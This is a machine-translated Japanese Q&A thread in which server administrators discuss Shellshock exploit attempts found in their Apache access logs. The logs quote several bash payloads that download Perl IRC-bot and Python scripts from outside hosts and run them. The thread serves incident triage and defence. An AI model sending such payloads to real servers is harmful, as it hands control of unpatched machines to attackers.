1

の下に次の行が表示されました/var/log/apache2/access_log

"GET /cgi-bin/hi HTTP/1.0" 404 357 "-" "() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""

私はまだbashにパッチを当てていませんでした。すぐにマシンをシャットダウンしました。

ログでこれを見た人や、で見つかった Perl スクリプトを調べた人はいhttp://213.5.67.223/juratますか? かなり良性に思えますが、どの程度心配する必要があるか知りたいですか?

shell338 行目で、関数が IRC チャネルの反対側の誰かからフェッチされたシェル コマンドを実行していることがわかります。

my @resp=`$comando 2>&1 3>&1`;

これは、サーバーと同じユーザー レベルで実行されapacheます。彼らが特権をエスカレートできなかったことを願っています。

4

3 に答える 3

1

access_log にそのような行がありましたが、一部は少し異なりました。

""() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""

=>これでダウンロードでき、vilain perl スクリプトを取得できます: http://pastie.org/9604492

別のIRCボットの悪用の良い例:)それが役立つことを願っています

于 2014-09-29T14:05:25.713 に答える
1

同様のスレッドのリンクを参照してください: https://superuser.com/questions/818257/is-this-an-attack-or-something-to-be-concerned-about-shellshock

これは、bash の脆弱性を悪用して perl スクリプト ベースの IRC ボットを実行しようとするスクリプトキディの試みです。もしあなたがbash を更新していて、さらに私のようにchrootで apache を実行していれば、何も心配する必要はありません。私のログ (下記参照) には、少なくとも 9 月 27 日以降、隔日でこれのいくつかのバージョンが見られます... これはただのノイズです。

12.64.2d.static.xlhost.com - - [27/Sep/2014:12:36:34 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""        
12.64.2d.static.xlhost.com - - [29/Sep/2014:00:39:41 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""        
web21.qna.vengit.com - - [01/Oct/2014:04:52:24 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""

今日気づいた別のさまざまなスクリプト (python スクリプト) の実行の試み... 注: python スクリプトがダウンロードされる google-traffic-analytics.com は、もちろん Google とは何の関係もありません。

cm232.delta210.maxonline.com.sg - - [04/Oct/2014:01:45:38 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
localhost - - [04/Oct/2014:01:45:41 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
169.118.103.218.static.netvigator.com - - [04/Oct/2014:01:45:45 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
mm-2-192-57-86.dynamic.pppoe.mgts.by - - [04/Oct/2014:01:45:52 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
于 2014-10-04T17:26:59.630 に答える